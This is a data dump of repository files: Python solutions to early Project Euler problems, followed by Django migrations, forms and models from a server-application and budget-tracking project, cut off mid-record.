"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 9\n\n\n\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which,\na2 + b2 = c2\n\nFor example, 3**2 + 4**2 = 9 + 16 = 25 = 5**2.\n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\nFind the product abc.\n\n\"\"\"\n\ndef checkTheorem(a,b,c):\n return a**2 + b**2 == c**2\n\ndef condition(a,b,c):\n return a < b < c\n\n\ndef checkSum(a,b,c):\n return a+b+c == 1000\n\ndef find():\n sum = 1000\n product = 0\n for a in range(1,sum//3):\n for b in range(a+1,sum//2):\n c = sum -a -b\n if checkTheorem(a,b,c):\n print(a,b,c)\n product = a * b *c\n return product\n\n\n \nprint(find())\n"
},
{
"alpha_fraction": 0.45534151792526245,
"alphanum_fraction": 0.5061296224594116,
"avg_line_length": 14.45945930480957,
"blob_id": "b33a845bba022903e596acd1b1986b06fdda427b",
"content_id": "427c9939d0e74c7bf5205325b10918176a4276ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 571,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 37,
"path": "/difficulty(5%)/10001st_prime.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 7 \n\n\n\nBy listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13.\n\nWhat is the 10001st prime number?\n\n\"\"\"\n\ndef checkPrime(val):\n check = True\n for i in range(2,val):\n if val % i == 0:\n check = False\n break\n else:\n check = True\n \n return check\n\ndef Prime(n):\n a = 2\n primeList = []\n\n while len(primeList) < n:\n if checkPrime(a):\n \n primeList.append(a)\n a = a + 1\n print(primeList[n-1])\n\n\nPrime(6)\n\n#104743"
},
{
"alpha_fraction": 0.5402626991271973,
"alphanum_fraction": 0.595659613609314,
"avg_line_length": 21.753246307373047,
"blob_id": "3092f9c3eba4729927f818721429bc37b349a509",
"content_id": "57c989d93d59130c2b31f32876f1c808d0942196",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1751,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 77,
"path": "/difficulty(5%)/highly_divisible_traingular_number.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\n\nproblem 10 \n\n\n\nThe sequence of triangle numbers is generated by adding the natural numbers.\n\n So the 7th triangle number would be 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28.\n The first ten terms would be:1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...\n\nLet us list the factors of the first seven triangle numbers:\n\n 1: 1\n 3: 1,3\n 6: 1,2,3,6\n 10: 1,2,5,10\n 15: 1,3,5,15\n 21: 1,3,7,21\n 28: 1,2,4,7,14,28\n\nWe can see that 28 is the first triangle number to have over five divisors.\n\nWhat is the value of the first triangle number to have over five hundred divisors?\n\n\"\"\"\n\nimport time\nimport functools\n\nstime = time.time()\n\n#we start wth number 28\nn = 28\n\nwhile True:\n # sum of number from 1 to n\n triangle_number = n*(n+1)/2\n n = n+1\n # a dict to stre powers of prime\n dic = {}\n\n # startiing with a prime number 2\n i = 2\n #for loop to factor a number\n while i <= triangle_number:\n #if i divides the number , then it is a prime factor\n if triangle_number % i == 0:\n #changing the value of number so that we will not divide it with the same number again and again\n triangle_number = triangle_number/i\n\n # we are storing the value in terms of power of the prime number\n\n if i in dic:\n dic[i] +=1\n else:\n dic[i] = 1\n i -=1\n i +=1\n\n # increasing the value of power by 1 to find the number of divisors\n powers = map(lambda x:(x+1),dic.values())\n \n\n # number of divisors\n divisors = functools.reduce(lambda x,y:x*y,powers)\n print(divisors)\n\n # conition to check if divisors > 500\n if divisors > 500:\n print((n-1)*(n)/2)\n break\n\netime = time.time()\n\n\nprint(etime-stime)"
},
{
"alpha_fraction": 0.6350710988044739,
"alphanum_fraction": 0.6540284156799316,
"avg_line_length": 16.66666603088379,
"blob_id": "f3ded4f1612dd01853e0b67d5f1765d6ac126bcb",
"content_id": "a0cc52d53c98eb9a81fc131e009c094817b35440",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 12,
"path": "/difficulty(5%)/largest_sum.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "'''\n\nWork out the first ten digits of the sum of the following one-hundred 50-digit numbers.\n\n'''\n\n\n\nwith open(\"data.txt\",\"r\") as file:\n data = [int(line.strip()) for line in file]\n\nprint(str(sum(data))[:10])"
},
{
"alpha_fraction": 0.6339285969734192,
"alphanum_fraction": 0.6741071343421936,
"avg_line_length": 20.03125,
"blob_id": "9e361533bf5073f777a34068e6cb467c06c8a053",
"content_id": "a966b82d7dca015a92cc4fc3562249a43cb55152",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 672,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 32,
"path": "/difficulty(5%)/sum_square_difference.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "'''\nproblem 6\n\nThe sum of the squares of the first ten natural numbers is, 385\n\nThe square of the sum of the first ten natural numbers is,3025\n\nHence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is\n3025 - 385 = 2640\n\nFind the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.\n\n'''\n\ndef sumOfSquare(n):\n sum = 0\n for i in range(n+1):\n sum += i*i\n\n return sum\n\ndef squareOfSum(n):\n sum = 0\n for i in range(n+1):\n sum +=i\n return sum**2\n \n\ndef result(n):\n return squareOfSum(n) -sumOfSquare(n)\n\nprint(result(100))"
},
{
"alpha_fraction": 0.5527728199958801,
"alphanum_fraction": 0.5921288132667542,
"avg_line_length": 20.461538314819336,
"blob_id": "4260ee03d7d3535f584fb5403bb7060241a9d893",
"content_id": "2f6994ff0dfe909e281ac7fba426e0eea54881e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 560,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 26,
"path": "/difficulty(5%)/largest_palindrome_product.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 4 \n\n\nA palindromic number reads the same both ways. The largest palindrome made from the product of two 2-digit numbers is 9009 = 91 × 99.\n\nFind the largest palindrome made from the product of two 3-digit number\n\"\"\"\n\n\ndef checkPalindrome(value):\n return str(value) == str(value)[::-1]\n\ndef palindrome():\n a = {}\n for i in range(0,1000):\n for j in range(0,1000):\n c = i * j\n \n if checkPalindrome(c):\n a[c] = str(i) +\"*\"+ str(j)\n return a\n\n\nresult = palindrome()\nprint(max(result))\n\n"
},
{
"alpha_fraction": 0.36346152424812317,
"alphanum_fraction": 0.4423076808452606,
"avg_line_length": 16.79310417175293,
"blob_id": "b9f88dec8bb5ffa049e42ca7b909868c734cdb45",
"content_id": "3aa46ac9cde0f461f4bc678d03dd986235f8087e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 520,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 29,
"path": "/difficulty(5%)/largest_prime_factor.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\n\"\"\"\nProblem 3\nThe prime factors of 13195 are 5, 7, 13 and 29.\n\nWhat is the largest prime factor of the number 600851475143 ?\n\n\"\"\"\n\ndef primefactor(n):\n if n < 0 :\n return\n p = 2\n PF = []\n while True:\n if n >= p ** 2:\n if n % p == 0:\n n = n/p\n PF.append(p)\n \n else:\n p +=1\n else:\n PF.append(int(n))\n break\n return PF\n \n\nresult = primefactor(600851475143)\nprint(max(result))\n\n\n\n"
},
{
"alpha_fraction": 0.6041666865348816,
"alphanum_fraction": 0.6432291865348816,
"avg_line_length": 16.5,
"blob_id": "0308d86031891b0b7249c2f7091da3d2863b6bbb",
"content_id": "806c18f0f231df8c64f2046b8a307b56a8924612",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 22,
"path": "/difficulty(5%)/smallest_multiple.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 5\n\n\n\n2520 is the smallest number that can be divided by each of the numbers from 1 to 10 without any remainder.\n\nWhat is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n\n\n\"\"\"\n\ndef gcd(x,y):\n return y and gcd(y, x % y) or x\n\ndef lcm(x,y):\n return x * y / gcd(x,y)\n \nn = 1\nfor i in range(1, 21):\n n = lcm(n, i)\nprint(n)"
},
{
"alpha_fraction": 0.5646766424179077,
"alphanum_fraction": 0.638059675693512,
"avg_line_length": 32.125,
"blob_id": "cbc87fcdec9841f5b4cab706700623e67970052a",
"content_id": "d64c3988daabea2c3949baee21f5c1db762d308e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 804,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 24,
"path": "/difficulty(5%)/even_fibonacci.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\n\"\"\"\nEach new term in the Fibonacci sequence is generated by adding the previous two terms. By starting with 1 and 2, the first 10 terms will be:\n\n1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...\n\nBy considering the terms in the Fibonacci sequence whose values do not exceed four million, find the sum of the even-valued terms.\n\"\"\"\n\n\nimport math\n\nSQ5 = 5 ** .5\nprint(SQ5)\nPHI = (1+SQ5) /2\n\ndef allEvenFibonacciUpTO(limit):\n highestIndexBelowLimit = math.floor(math.log(limit * SQ5) / math.log(PHI))\n print(\"highest_limit:\", highestIndexBelowLimit)\n\n n = math.floor(highestIndexBelowLimit / 3)\n result = ((PHI ** (3 * n + 3) - 1) / (PHI ** 3 - 1) - ((1 - PHI) ** (3 * n + 3) - 1) / ((1 - PHI) ** 3 - 1)) / SQ5\n return result\n \nprint(int(allEvenFibonacciUpTO(4e6))) # // 4613731.999999999\n\n\n \n\n"
},
{
"alpha_fraction": 0.43621399998664856,
"alphanum_fraction": 0.4835391044616699,
"avg_line_length": 12.571428298950195,
"blob_id": "58d881d77edba7fa087fe0f2b1b72764bb91bc22",
"content_id": "7679f66ac524d4d16b1e52b23a7b4ebe8744cf39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 486,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 35,
"path": "/difficulty(5%)/summation_of_primes.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 10\n\n\n\nThe sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n\nFind the sum of all the primes below two million.\n\n\"\"\"\n\nimport math\ndef checkPrime(val):\n \n for i in range(2,int(math.sqrt(val))+1):\n if val % i == 0:\n return False\n \n \n return True\n \n \n\ndef Prime(n):\n a = 2\n sum = 0\n\n \n for i in range(2,n):\n if checkPrime(i):\n sum = sum + i\n return sum\n\n\nprint(Prime(2000000))\n\n \n\n"
},
{
"alpha_fraction": 0.5631720423698425,
"alphanum_fraction": 0.7029569745063782,
"avg_line_length": 25.464284896850586,
"blob_id": "600837efb18812bf47f15468863d1beb7133cb78",
"content_id": "5229db38c998ab1978b5a9ec18d623fea0cd2f4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 744,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 28,
"path": "/difficulty(5%)/multple.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\" \nMultiple of 3 and 5 \n\n\nIf we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.\n\nFind the sum of all the multiples of 3 or 5 below 1000.\n\n\"\"\"\n\n######### O(1) time method \n\nLIMIT=99999999999999999999999999999999999999999999999999999999999999999999999\n\n# Get the upper bounds for the arithmetic series\nupper_for_three = LIMIT // 3\nupper_for_five = LIMIT // 5\nupper_for_fifteen = LIMIT // 15\n\n# calculate sums\nsum_three = 3*upper_for_three*(1 + upper_for_three) / 2\nsum_five = 5*upper_for_five*(1 + upper_for_five) / 2\nsum_fifteen = 15*upper_for_fifteen*(1 + upper_for_fifteen) / 2\n\n# calculate total\ntotal = sum_three + sum_five - sum_fifteen\n\nprint(int(total))\n\n\n\n"
},
{
"alpha_fraction": 0.5316455960273743,
"alphanum_fraction": 0.5705243945121765,
"avg_line_length": 19.054546356201172,
"blob_id": "634e75510e39531459e926315aca606efd50278b",
"content_id": "d33a822ee82eb763b4aba6a371b77e819e05b4db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1108,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 55,
"path": "/difficulty(5%)/Lattice_paths.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nproblem 15\n\nStarting in the top left corner of a 2×2 grid, and only being able to move to the right and down, \nthere are exactly 6 routes to the bottom right corner.\n\nHow many such routes are there through a 20×20 grid?\n\"\"\"\n\n\n# Recursive soluton\ncache = {}\ndef countRoutes(m,n):\n if n == 0 or m == 0:\n return 1\n\n if (m,n) in cache.keys():\n return cache[(m,n)]\n cache[(m,n)] = countRoutes(m,n-1) + countRoutes(m-1,n)\n return cache[(m,n)]\n#print(countRoutes(20,20))\n\n# Iterative Solution O(mxn) time\n\ndef countRoute(m,n):\n grid = [[0 for i in range(m+1)] for j in range(n+1)]\n \n\n for i in range(0,m+1):\n grid[i][0] = 1\n\n for j in range(0,n+1):\n grid[0][j] = 1\n print(grid)\n \n for i in range(1,m+1):\n for j in range(1,n+1):\n grid[i][j] = grid[i-1][j] + grid[i][j-1]\n return grid[m][n]\n\n#print(countRoute(3,3))\n\n\n########## Combinatorial Solution O(n) time and O(1) space\n\n# m = n for perfect grid\ndef Count(n):\n result = 1\n\n for i in range(1,n+1):\n result = result *(n+i)/i\n\n print(result)\n\nCount(20)\n\n\n\n"
},
{
"alpha_fraction": 0.807692289352417,
"alphanum_fraction": 0.807692289352417,
"avg_line_length": 25,
"blob_id": "3cbd0459d29d05f688a1373a056d5a42188ea5e7",
"content_id": "f580d1da3a9b255c46e3c6a38051bf4b212299e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 52,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "# project_EULER\nsolution of project euler in python\n"
},
{
"alpha_fraction": 0.6088849902153015,
"alphanum_fraction": 0.650696873664856,
"avg_line_length": 22.9375,
"blob_id": "1e5544e1c4dc37b370a80783cc7d24d7099ece0e",
"content_id": "6132ab54089fec53122e8d723ce7b09d4685190b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 48,
"path": "/difficulty(5%)/longest_collatz_sequence.py",
"repo_name": "ashokgaire/project_EULER",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThe following iterative sequence is defined for the set of positive integers:\n\nn → n/2 (n is even)\nn → 3n + 1 (n is odd)\n\nUsing the rule above and starting with 13, we generate the following sequence:\n13 → 40 → 20 → 10 → 5 → 16 → 8 → 4 → 2 → 1\n\nIt can be seen that this sequence (starting at 13 and finishing at 1) contains 10 terms. \nAlthough it has not been proved yet (Collatz Problem), it is thought that all starting numbers finish at 1.\n\nWhich starting number, under one million, produces the longest chain?\n\nNOTE: Once the chain starts the terms are allowed to go above one million\n\n\"\"\"\n\n\nnumber = 1000000\n\nsequenceLength = 0\nstartingNumber = 0\ncache = [None]*(number+1)\n\nfor i in range(len(cache)):\n cache[i] = -1\n\ncache[1] = 1\n\nfor i in range(2,number):\n sequence = i\n k = 0\n while(sequence !=1 and sequence >=i):\n k+=1\n if sequence % 2 == 0:\n sequence = sequence/2\n else:\n sequence = sequence*3 +1\n\n \n cache[i] = k + cache[int(sequence)]\n\n if(cache[i] > sequenceLength):\n sequenceLength = cache[i]\n startingNumber = i\n\nprint(startingNumber, sequenceLength)"
}
] | 14 |
up-x-men/ssp-api | https://github.com/up-x-men/ssp-api | 2e405117da4d12ca66ee37903127d657b754d8ac | 6f32bf3d40da938345e49de213bef658b66c0d46 | ed0de46a3edb6f73a16036f5da4707f87c0afe34 | refs/heads/master | 2017-05-08T22:37:02.953236 | 2017-05-08T01:48:54 | 2017-05-08T01:48:54 | 82,298,011 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.49061521887779236,
"alphanum_fraction": 0.5912408828735352,
"avg_line_length": 48.17948532104492,
"blob_id": "b301d247cd06bb4899fd540b10c41acbf1d764ad",
"content_id": "c6770ee350bc169495974211e92795432f924cc1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1918,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 39,
"path": "/apps/serverApplication/migrations/0001_initial.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-10 15:46\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Application',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('ip', models.CharField(max_length=50, verbose_name='IP\\u5730\\u5740')),\n ('username', models.CharField(max_length=20, verbose_name='\\u7528\\u6237\\u540d')),\n ('user', models.CharField(max_length=10, verbose_name='\\u4f7f\\u7528\\u4eba')),\n ('team', models.CharField(max_length=50, verbose_name='\\u5ba4/\\u56e2\\u961f')),\n ('source', models.CharField(max_length=50, verbose_name='\\u6765\\u6e90')),\n ('environment', models.CharField(max_length=20, verbose_name='\\u73af\\u5883\\u7c7b\\u522b')),\n ('os', models.CharField(max_length=10, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf')),\n ('applyTime', models.CharField(max_length=100, verbose_name='\\u7533\\u8bf7\\u65f6\\u95f4')),\n ('expireDate', models.CharField(max_length=100, verbose_name='\\u5230\\u671f\\u65f6\\u95f4')),\n ('comment', models.TextField(blank=True, verbose_name='\\u7528\\u9014\\u63cf\\u8ff0')),\n ('lastModified', models.CharField(max_length=100)),\n ('received', models.CharField(default='no', max_length=10, verbose_name='\\u662f\\u5426\\u5df2\\u7ecf\\u56de\\u6536')),\n ],\n options={\n 'ordering': ('applyTime',),\n 'verbose_name': '\\u670d\\u52a1\\u5668\\u7533\\u8bf7\\u4fe1\\u606f',\n 'verbose_name_plural': '\\u670d\\u52a1\\u5668\\u7533\\u8bf7\\u4fe1\\u606f',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.4920634925365448,
"alphanum_fraction": 0.6078270673751831,
"avg_line_length": 57,
"blob_id": "20517a6abf90450f2e6a64dbc7b067060a8d2112",
"content_id": "1072453bbdf90b6105e7b3759d8be6519c0c57ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3654,
"license_type": "no_license",
"max_line_length": 267,
"num_lines": 63,
"path": "/apps/contractBudget/migrations/0001_initial.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-27 16:26\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Budget',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('year', models.CharField(max_length=10, verbose_name='\\u9884\\u7b97\\u5e74\\u5ea6')),\n ('investment', models.FloatField(default=0, verbose_name='\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u7814\\u53d1\\u8d39\\u7528')),\n ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6dfb\\u52a0\\u65f6\\u95f4')),\n ('lastModified', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6700\\u540e\\u4fee\\u6539\\u65f6\\u95f4')),\n ],\n options={\n 'ordering': ('year',),\n 'verbose_name': '\\u9879\\u76ee\\u9884\\u7b97',\n 'verbose_name_plural': '\\u9879\\u76ee\\u9884\\u7b97',\n },\n ),\n migrations.CreateModel(\n name='Project',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('projectId', models.CharField(max_length=200, unique=True, verbose_name='\\u9879\\u76ee\\u7f16\\u53f7')),\n ('name', models.CharField(max_length=200, verbose_name='\\u9879\\u76ee\\u540d\\u79f0')),\n ('type', models.CharField(max_length=100, verbose_name='\\u9879\\u76ee\\u7c7b\\u578b')),\n ('department', models.CharField(max_length=100, verbose_name='\\u4e3b\\u529e\\u90e8\\u95e8')),\n ('investment', models.FloatField(default=0, verbose_name='\\u9879\\u76ee\\u6279\\u590d\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u9879\\u76ee\\u6279\\u590d\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u9879\\u76ee\\u6279\\u590d\\u7814\\u53d1\\u8d39\\u7528')),\n ('total', models.FloatField(default=0, verbose_name='\\u9879\\u76ee\\u6279\\u590d\\u603b\\u8d39\\u7528')),\n ('status', models.CharField(choices=[('\\u6267\\u884c\\u4e2d', '\\u6267\\u884c\\u4e2d'), ('\\u6267\\u884c\\u5b8c', '\\u6267\\u884c\\u5b8c'), ('\\u5df2\\u79fb\\u4ea4', '\\u5df2\\u79fb\\u4ea4')], default='\\u6267\\u884c\\u4e2d', max_length=10, verbose_name='\\u72b6\\u6001')),\n ('comment', models.CharField(blank=True, max_length=200, verbose_name='\\u5907\\u6ce8')),\n ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6dfb\\u52a0\\u65f6\\u95f4')),\n ('lastModified', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6700\\u540e\\u4fee\\u6539\\u65f6\\u95f4')),\n ],\n options={\n 'ordering': ('add_time',),\n 'verbose_name': '\\u9879\\u76ee\\u4fe1\\u606f',\n 'verbose_name_plural': '\\u9879\\u76ee\\u4fe1\\u606f',\n },\n ),\n migrations.AddField(\n model_name='budget',\n name='project',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contractBudget.Project', verbose_name='\\u6240\\u5c5e\\u9879\\u76ee'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4980884790420532,
"alphanum_fraction": 0.6013107299804688,
"avg_line_length": 48.486488342285156,
"blob_id": "d210987319a6c53a9438c8313cb6fe5ca6a3bea1",
"content_id": "fcf79c4a5e0a282d839557e5f63683354d435d63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1831,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 37,
"path": "/apps/contractBudget/migrations/0004_supplier.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-28 16:34\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0003_budget_total'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Supplier',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('supplierId', models.CharField(max_length=100, unique=True, verbose_name='\\u4f9b\\u5e94\\u5546\\u7f16\\u53f7')),\n ('accountName', models.CharField(max_length=100, verbose_name='\\u5f00\\u6237\\u540d\\u79f0')),\n ('bankMaster', models.CharField(max_length=50, verbose_name='\\u5f00\\u6237\\u94f6\\u884c')),\n ('bankBranch', models.CharField(max_length=50, verbose_name='\\u5f00\\u6237\\u652f\\u884c')),\n ('accountId', models.CharField(max_length=100, verbose_name='\\u94f6\\u884c\\u8d26\\u53f7')),\n ('accountAddr', models.CharField(max_length=100, verbose_name='\\u5f00\\u6237\\u6240\\u5728\\u5730')),\n ('contact', models.CharField(max_length=50, verbose_name='\\u8054\\u7cfb\\u4eba')),\n ('phone', models.CharField(max_length=50, verbose_name='\\u8054\\u7cfb\\u65b9\\u5f0f')),\n ('email', models.CharField(max_length=50, verbose_name='\\u7535\\u5b50\\u90ae\\u7bb1\\u5730\\u5740')),\n ('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u6dfb\\u52a0\\u65f6\\u95f4')),\n ],\n options={\n 'ordering': ('add_time',),\n 'verbose_name': '\\u4f9b\\u5e94\\u5546',\n 'verbose_name_plural': '\\u4f9b\\u5e94\\u5546',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.41564562916755676,
"alphanum_fraction": 0.6503298878669739,
"avg_line_length": 52.04999923706055,
"blob_id": "e6389ab59ef5aeeff194c9b80e75331d8e7defc5",
"content_id": "fcf39d730b0583baf58fdcdfcf415d3705e68340",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1061,
"license_type": "no_license",
"max_line_length": 648,
"num_lines": 20,
"path": "/apps/application/migrations/0021_auto_20170428_1107.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-04-28 11:07\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0020_auto_20170426_1613'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='serverapplication',\n name='status',\n field=models.CharField(choices=[('\\u7533\\u8bf7\\u4e2d', '\\u7533\\u8bf7\\u4e2d'), ('\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d', '\\u5ba1\\u6838\\u901a\\u8fc7-\\u5206\\u914d\\u4e2d'), ('\\u4f7f\\u7528\\u4e2d', '\\u4f7f\\u7528\\u4e2d'), ('\\u62d2\\u7edd', '\\u62d2\\u7edd'), ('\\u7533\\u8bf7\\u56de\\u6536\\u4e2d', '\\u7533\\u8bf7\\u56de\\u6536\\u4e2d'), ('\\u5ef6\\u671f\\u4e2d', '\\u5ef6\\u671f\\u4e2d'), ('\\u7533\\u8bf7\\u5ef6\\u671f\\u4e2d', '\\u7533\\u8bf7\\u5ef6\\u671f\\u4e2d'), ('\\u5df2\\u5230\\u671f', '\\u5df2\\u5230\\u671f'), ('\\u5df2\\u56de\\u6536', '\\u5df2\\u56de\\u6536'), ('\\u90e8\\u5206\\u56de\\u6536', '\\u90e8\\u5206\\u56de\\u6536')], default='\\u7533\\u8bf7\\u4e2d', max_length=20),\n ),\n ]\n"
},
{
"alpha_fraction": 0.8421052694320679,
"alphanum_fraction": 0.8421052694320679,
"avg_line_length": 57,
"blob_id": "2d3eca57eed51259caa67fb37c5a5a0f45eca22d",
"content_id": "27aa4c1ba25dc9ac231ec3a0ade70284db5f1d49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 57,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 1,
"path": "/apps/application/__init__.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "default_app_config = \"application.apps.ApplicationConfig\""
},
{
"alpha_fraction": 0.6227272748947144,
"alphanum_fraction": 0.6727272868156433,
"avg_line_length": 26.625,
"blob_id": "db8b6aa09d39205fffe9b04083ec2919fb17b37f",
"content_id": "848364b2e7afb0dec7d63c7a80919779f7baae8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 220,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 8,
"path": "/apps/users/forms.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/9 20:38'\nfrom django import forms\n\nclass LoginFrom(forms.Form):\n email = forms.EmailField(required=True)\n password = forms.CharField(required=True)"
},
{
"alpha_fraction": 0.7241379022598267,
"alphanum_fraction": 0.7413793206214905,
"avg_line_length": 28.125,
"blob_id": "ae0787c35c539554ebcbc6fc4964ffb4a579a49e",
"content_id": "6b243e261c7b8dd5891dacce738c4cd558418c0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 240,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 8,
"path": "/apps/administrator/models.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "#encoding: utf-8\nfrom __future__ import unicode_literals\n\nfrom django.db import models\n# Create your models here.\n\nclass Script(models.Model):\n file = models.FileField(upload_to=\"scripts/%Y/%m\",verbose_name=\"上传路径\",max_length=100)"
},
{
"alpha_fraction": 0.733759343624115,
"alphanum_fraction": 0.7507987022399902,
"avg_line_length": 46,
"blob_id": "d0598e813262c1f0cb34691c455286486293eaf5",
